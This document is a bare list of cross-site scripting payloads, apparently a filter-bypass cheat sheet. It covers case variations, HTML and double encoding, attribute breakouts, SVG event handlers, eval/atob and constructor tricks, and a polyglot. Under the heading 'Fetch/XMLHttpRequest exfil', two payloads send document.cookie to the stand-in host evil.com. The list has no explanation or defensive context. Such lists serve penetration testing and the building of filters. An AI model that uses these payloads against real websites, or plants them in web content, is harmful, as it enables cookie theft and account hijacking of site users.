# Case variations
<ScRiPt>alert(1)</sCrIpT>
<SCRIPT>alert(1)</SCRIPT>

# Without parentheses
<script>alert`1`</script>
<img src=x onerror=alert`1`>

# HTML encoding
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<img src=x onerror="&#x61;lert(1)">

# Double encoding
%253Cscript%253Ealert(1)%253C/script%253E

# Without quotes/spaces
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>

# Breaking out of attributes
"><script>alert(1)</script>
'><script>alert(1)</script>
" onfocus=alert(1) autofocus="
' onfocus=alert(1) autofocus='

# SVG variations
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1)>
<svg><set onbegin=alert(1)>

# Using eval
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>

# Template literals
<script>alert`document.cookie`</script>
<img src=x onerror=alert(`XSS`)>

# Constructor
<img src=x onerror=alert.call(null,1)>
<img src=x onerror=[].constructor.constructor('alert(1)')()>

# Fetch/XMLHttpRequest exfil
<img src=x onerror="fetch('http://evil.com/?c='+document.cookie)">
<img src=x onerror="new Image().src='http://evil.com/?c='+document.cookie">

# Polyglots
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//
